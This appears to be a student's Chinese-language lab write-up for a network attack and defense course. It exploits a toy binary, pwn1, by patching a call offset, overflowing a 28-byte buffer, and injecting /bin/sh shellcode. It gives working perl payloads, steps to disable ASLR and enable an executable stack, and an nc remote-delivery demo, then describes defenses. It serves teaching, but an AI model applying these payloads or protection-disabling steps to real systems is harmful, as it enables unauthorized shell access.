《网络对抗技术》Exp1 逆向破解实验

《网络对抗技术》Exp1 逆向破解实验

1 实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

 

    • 三个实践内容如下:
      • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
      • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
      • 注入一个自己制作的shellcode并运行这段shellcode。
    • 这几种思路,基本代表现实情况中的攻击目标:
      • 运行原本不可访问的代码片段
      • 强行修改程序执行流
      • 以及注入运行任意代码。

 

2 基础知识点

1.反汇编指令  objdump -d xxx | more 

 -d表示反汇编,xxx为可执行文件,|为管道符,more为分页指令

2.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

NOP汇编指令的机器码是“90”
JNE汇编指令的机器码是“75”
JE 汇编指令的机器码是“74”
JMP汇编指令的机器码是“eb”
CMP汇编指令的机器码是“39”

3.掌握反汇编与十六进制编程器 

反汇编指令

objdump -d filename

objdump(object dump) 项目导出

-d(disassemble) 反汇编

filename 反汇编的可执行文件

如果我们想要以全屏幕的方式按页显示反汇编的内容,可以利用“管道”,即在反汇编指令后添加| more,这样我们就可以利用more的一些快捷键,如:Enter(向下翻滚一行),空格(向下滚动一屏),Q(退出命令)

十六进制编程器,是用来以16进制视图进行文本编辑的编辑工具软件。其实我们只需要用各系统都兼容的“vim”编辑器就可以实现十六进制编辑的功能。具体步骤如下:

  • 输入命令vi pwn1查看可执行文件内容,为ASCII码形式显示;
  • 输入:%!xxd将显示模式切换为16进制模式;
  • 进行相关操作后,输入:%!xxd -r转换16进制为为ASCII码形式。

3 直接修改程序机器指令,改变程序执行流程

  • 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具

  • 学习目标:理解可执行文件与机器指令

  • 进阶:掌握ELF文件格式,掌握动态技术

步骤一:可执行文件反汇编并计算

 objdump -d pwn1 | more 

"call 8048491 "是汇编指令

指令将调用位于地址8048491处的foo函数;

其对应机器指令为“e8 d7ffffff”,e8即跳转之意。

本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,e8即挑战,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29=8048491,就是foo的内存地址

main函数调用foo,对应机器指令为“ e8 d7ffffff”,

我们的目标是它调用getShell,将修改“d7ffffff”为,"getShell-80484ba"对应的补码。

用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。

步骤二:修改可执行文件

cp pwn1 pwn2    //复制pwn1得到pwn2
vim pwn2    //进入vim编辑pwn2

以下操作在vim中操作(此时为乱码)
1.按下ESC
2.输入:%!xxd,将显示模式切换为16进制模式
3.输入/d7  //查找需要修改的地方(如果搜e8 d7注意要有空格,否则会搜索不到)可以多查找几次,以防有重复字段,一般关键词前后十个字节一致,就是查找目标值
4.按下i,插入模式,将d7改为c3
5.按下ESC,输入:%!xxd -r  //转换16进制为原格式,这一步一定要做,否则在反编译时会提示格式错误
6.输入:wq,保存并退出
7.objdump -d pwn2 | more  //对比确认

反编译验证一下:

步骤三:运行一下pwn1和pwn2:

  • pwn1的功能是回显键盘输入;
  • pwn2的功能是实现shell。

以上编辑操作也可以在图形化的16进制编程器中完成。

apt-get install wxhexeditor    //安装wxhexedior
wxHexEditor  //注意大小写,否则会显示command not found

4 通过构造输入参数,造成BOF攻击,改变程序执行流

  • 知识要求:堆栈结构,返回地址
  • 学习目标:理解攻击缓冲区的结果,掌握返回地址的获取
  • 进阶:掌握ELF文件格式,掌握动态技术

 步骤一:反汇编,了解程序的基本功能

原理:foo函数有漏洞:foo函数中给输入的字符串预留了28个字节的空间

在正常执行的情况下,call调用foo,同时在堆栈上压上返回地址值:80484ba

我们利用缓冲区溢出覆盖返回地址,使得程序转向我们预期的getshell,运行getshell

该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞

08048491 <foo>:
 8048491:    55                       push   %ebp
 8048492:    89 e5                    mov    %esp,%ebp
 8048494:    83 ec 38                 sub    $0x38,%esp
 8048497:    8d 45 e4                 lea    -0x1c(%ebp),%eax
 804849a:    89 04 24                 mov    %eax,(%esp)


这里读入字符串,但系统只预留了28字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址

 步骤二:确认输入字符串哪几个字符会覆盖到返回地址

gdb pwn1    //如果没有安装gdb,则输入命令apt install gdb

以下内容为进入gdb调试器
r     //r 表示运行(run)
输入测试    //不超过28个字节,则正常回显输出输入字符
                //超过28个字节,则覆盖EIP

info r    //info 表示显示,r为寄存器(register),寄存器检查

步骤三:覆盖返回地址

getShell的内存地址,通过反汇编时可以看到,getshell函数的地址为: 0x0804847d

接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。

gdb pwn1

//以下操作在gdb中
break *0x804849d
info break    //查看地址
r    //运行
info r    //查看eip寄存器地址

对比之前 ==eip 0x34333231 0x34333231== ,正确应用输入 ==11111111222222223333333344444444\x7d\x84\x04\x08==。

 

步骤四:构造输入字符串

由于小端优先,而且输入字符串时以ASCII码输入,因此要转换为 \x7d\x84\x04\x08 

由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input    //由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
xxd input    //使用16进制查看指令xxd查看input文件的内容是否如预期
(cat input; cat) | ./pwn1    //将input的输入,通过管道符“|”,作为pwn1的输入

关于Perl: Perl是一门解释型语言,不需要预编译,可以在命令行上直接使用。 使用输出重定向“>”将perl生成的字符串存储到文件input中

补充:理解函数调用和堆栈

 

5 注入Shellcode并执行

步骤一:准备一段Shellcode

  • shellcode就是一段机器指令(code)
    • 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
    • 所以这段机器指令被称为shellcode。
    • 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

我们需要确定shellcode放哪,shellcode可能在EIP前或是EIP后,这取决于操作系统,此次实验放在EIP后面。

步骤二:安装execstack

execstack需要我们另外安装,在网络上的教程中,最终会出现 无法定位软件包 execstack 提示。

因此,我们使用老师给的压缩包prelink_0.0.20130503.orig.tar,步骤如下:

1 //把prelink_0.0.20130503.orig.tar放到kali虚拟机中
2 //在虚拟机中解压缩
3 //在解压缩文件中打开终端
4 sudo apt-get install libelf-dev
5 ./configure
6 make
7 sudo make install

步骤三:准备工作

堆栈可执行-->shellcode放在堆栈上,正常是不可执行的。

关闭地址随机化,目的:调试-->第1、2次调试中使用堆栈地址不变,一般堆栈随机化,防范多次调试。

关闭AL8R

execstack -s pwn1    //设置堆栈可执行
execstack -q pwn1    //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space

sudo -s    //否则权限不够
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化,2为开启,0为关闭
more /proc/sys/kernel/randomize_va_space

步骤四:构造要注入的payload

  • Linux下有两种基本构造攻击buf的方法:
    • retaddr+nop+shellcode
    • nop+shellcode+retaddr。
  • 因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
  • 简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边
  • 我们这个buf够放这个shellcode了
  • 结构为:nops+shellcode+retaddr。
    • nop一为是了填充,二是作为“着陆区/滑行区”。
    • 我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。

失败案例(坑)

最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。

特别提醒:最后一个字符千万不能是\x0a。不然下面的操作就做不了了。

没有回车符是为了让程序停在gets获取字符串的函数前,相当于输入了字符没有按回车键,否则程序执行了gets就直接运行puts函数,就直接运行完了,没有机会停留在进程中让我们打开调试

perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

接下来我们来确定\x4\x3\x2\x1到底该填什么。

打开一个终端注入这段攻击buf:

(cat input_shellcode;cat) | ./pwn1

再开另外一个终端,用gdb来调试pwn1这个进程。一定要另开一个终端!

建议打开root权限。

注意:查看esp寄存器,要根据自己的地址进行下面的操作!!!

 

ps -ef | grep pwn1    //找到pwn1的进程号是:5906,根据自己的结果进行调整pid号会变化
gdb    //打开gdb调试器

//以下在gdb中进行
attach 5906    //绑定进程
//通过设置断点,来查看注入buf的内存地址
disassemble foo
//断在这,这时注入的东西都大堆栈上了
//ret完,就跳到我们覆盖的retaddr那个地方了
break *0x080484ae
//在另外一个终端中按下回车,这就是前面为什么不能以\x0a来结束 input_shellcode的原因。一定要在另一个终端!!!
c    //继续
info r esp    //查看esp寄存器,要根据自己的地址进行下面的操作!!!
x/16x 0xffffd5cc  //看到 01020304了,再往前找28字节
x/16x 0xffffd5b0  //看到0xc0319090了,再向前4个字节即可
x/16x 0xffffd5ac    //从这开始就是我们的Shellcode
c    //继续
//可以看到这个返回地址占位也是对的
q    //退出gdb

 向前4个字节,是eip占四个字节,而eip后面紧跟nops,nops的十六进制为0x909090

perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
(cat input_shellcode;cat) | ./pwn1

结果显然是失败了

 

查找失败原因:

//与上面步骤类似
//在一个终端中输入
(cat input_shellcode;cat) | ./pwn1
//在另一个终端中输入
ps -ef | grep pwn1
gdb
//以下在gdb中进行
attach 端口号    //与上一次不同
info r    //查看寄存器
x/16x 0xffffd5b0    //对应地址,看起来buf没问题
si    //si是step instruction的简写,表示运行一条指令
//也跳转到我们的shellcode了,那我们就一步步执行看哪步错
//出错了

 

以下是正确操作:

结构为:anything+retaddr+nops+shellcode。

看到 01020304了,就是返回地址的位置。shellcode就挨着,所以地址是 0xffffd5cc + 0x00000004 = 0xffffd5d0

每个人的情况不一样,因根据自己的情况修改命令。

perl -e 'print "A" x 32;print "\xd0\xd5\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode 
//不同的电脑运行情况不同,根据实际情况修改命令,如下图红框所示
xxd input_shellcode
(cat input_shellcode;cat) | ./pwn1

结果:攻击成功!

 

注意:

以上实践是在非常简单的一个预设条件下完成的:

(1)关闭堆栈保护(gcc -fno-stack-protector

(2)关闭堆栈执行保护(execstack -s)

(3)关闭地址随机化 (/proc/sys/kernel/randomize_va_space=0)

(4)在x32环境下

(5)在Linux实践环境

 

步骤五:结合nc模拟远程攻击

 在同一台主机上做的实验;该实验最好在互相连通的两台Linux上做,将ip地址替换为主机1的IP即可。

下面为在一台主机上进行:

主机1,模拟一个有漏洞的网络服务:

nc -l 127.0.0.1 -p 28234  -e ./pwn1
//-l 表示listen, -p 后加端口号 -e 后加可执行文件,网络上接收的数据将作为这个程序的输入
//如果是两个虚拟机互联
ifconfig    //查看ip地址,将127.0.0.1替换

主机2,连接主机1并发送攻击载荷:

(cat input_shellcode; cat) | nc 127.0.0.1 28234
//两个虚拟机互联则使用主机1的ip地址替换127.0.0.1
//然后输入shell指令,例如ls

 

两台主机上进行:

 

//主机1可以通过ifconfig进行查询IP地址
//主机一
nc -l -p 28234  -e ./pwn1

//主机二
(cat input_shellcode; cat) | nc 192.168.11.151 28234
//其中192.168.11.151为主机

 

 遇到的问题:

在两台主机互联时,按照指令输入时,主机二一旦输入相应命令,主机一就会出现 invalid connection to [192.168.11.151] from (UNKNOWN) [192.168.11.153] 32974 ,在关闭虚拟机的防火墙后,仍存在这样的问题,关闭防火墙的命令为

sudo apt-get install ufw     //安装
ufw disable    //关闭防火墙

  后来尝试:参考老师和同学的建议,在主机一的命令中隐去主机一的ip地址,解决了问题。隐去IP地址,能够避免主机存在多个IP地址,发送存在限制的问题

 

6 Bof攻击防御技术

步骤一:从防止注入的角度

在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。

 

步骤二: 注入入了也不让运行

结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了。

execstack -s pwn1    //把堆栈设置为可执行
execstack -q pwn1    //查询堆栈状态
//此时我们的攻击可以执行,如上实验

excstack -c pwn1   //把堆栈设置为不可执行
execstack -q pwn1    //查询堆栈状态
//此时我们的攻击不可执行了

//以下测试攻击
perl -e 'print "A" x 32;print "\xd0\xd5\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
(cat input_shellcode;cat) | ./pwn1

 为不影响第三步结果,因此要再次 execstack -s pwn1 ,将堆栈设为可执行。

步骤三:增加shellcode的构造难度

shellcode中需要猜测==返回地址==的位置,需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实:应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR,地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。

在前面的工作里面,我们把地址随机化关闭了,才达到了攻击成功的目的。

 /proc/sys/kernel/randomize_va_space 用于控制Linux下 内存地址随机化机制(address space layout randomization),有以下三种情况

0 - 表示关闭进程地址空间随机化。

1 - 表示将mmap的基址,stack和vdso页面随机化。

2 - 表示在1的基础上增加栈(heap)的随机化。

echo "1" > /proc/sys/kernel/randomize_va_space    //将mmap的基址,stack和vdso页面随机化
echo "2" > /proc/sys/kernel/randomize_va_space    //在1的基础上增加栈(heap)的随机化。
more /proc/sys/kernel/randomize_va_space    //查看
(cat input_shellcode;cat) | ./pwn1    //尝试攻击

 

从管理的角度

加强编码质量。注意边界检测。使用最新的安全的库函数。

 

7 实验收获与感想

在整个实验过程中,我先学习视频,边学边做笔记,但是掌握程度不够,通过实际操作才能真正理解输入命令和命令里面数据的意义,也遇到了很多问题,比如在修改./pwn2时,忘记:%!xxd -r转回格式,导致无法运行,再通过vi中转回格式,仍会存在格式问题,只能在保存前进行格式转换,gdb没有安装,输入apt install gdb进行安装,也有遇到权限问题,通过sudo -s命令进入root模式,也在老师的指导下,安装了execstack,也在查看寄存器和地址的过程,理解缓冲区溢出的工作原理,函数的调用和堆栈的内存存储方式,将老师演示的存储图掌握。在我尝试两个主机中结合nc模拟远程攻击,遇到了问题 invalid connection to [192.168.11.151] from (UNKNOWN) [192.168.11.153] 32914 根据查询资料,两台主机测试ping指令都能ping通,没有连接问题,也在同一局域网下,猜测是虚拟机防火墙问题,经过尝试证实猜测错误,而后参考同学和老师建议,修改主机一中命令,隐去主机的IP地址,成功解决问题。在做实验时,我们需要更加谨慎,学习每个步骤和每个参数的含义。

 

8 什么是漏洞?漏洞有什么危害?

答:本次实验的漏洞是指在输入时,没有进行边界测试,导致输入溢出缓冲区,覆盖EIP,执行我们预期的代码。

而在课程的学习中,我们学习到的漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,存在技术缺陷或者程序问题,从而可以使攻击者能够在未授权的情况下访问或破坏系统,执行我们想要的程序。

危害:漏洞影响面逐步扩大,超高危漏洞比率大幅增加,漏洞修复率处于历史较低水平,威胁形势依然严峻。

1.程序的正常功能无法按照预期执行,对服务器的安全收到影响,执行任意系统命令,攻击者能直接控制目标服务器,危害的严重程度重大;

2.程序被非法控制和破坏,安装恶意软件,导致病毒传播;

3.可能会导致信息泄漏,身份信息没有隐私,重要信息泄露,造成损失,暴露服务器的信息,使攻击者能够通过泄露的信息入侵;

4.帐号密码泄漏,导致攻击者直接操作网站后台或数据库,操控一些可能有危害,邮件泄露会被垃圾邮件骚扰,被攻击者利用社会工程学手段获取更多信息,扩大危害。

原文地址:https://www.cnblogs.com/regina1st/p/14502181.html